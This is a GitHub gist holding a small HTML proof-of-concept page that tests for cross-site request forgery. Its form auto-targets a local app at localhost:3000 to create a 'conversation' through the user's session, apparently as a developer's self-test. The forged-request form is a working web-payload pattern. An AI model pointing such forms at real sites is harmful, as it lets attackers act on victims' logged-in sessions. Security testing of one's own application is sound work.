Skip to content

Instantly share code, notes, and snippets.

@ryan-scott-dev
Created September 23, 2014 01:03
Show Gist options
  • Save ryan-scott-dev/efbd1135e16d9c078232 to your computer and use it in GitHub Desktop.
Save ryan-scott-dev/efbd1135e16d9c078232 to your computer and use it in GitHub Desktop.
CSRF Test
<!DOCTYPE html>
<html>
<head>
<title>This file will try and create a conversation through a CSRF exploit using the session!</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<h1>This file will try and create a node in the cloud using a CSRF exploit using the session!</h1>
<form action="http://localhost:3000/conversations" method="POST">
<textarea name="request" text="I want a hacked jacket"></textarea>
<input type="submit" value="Create Conversation"/>
</form>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment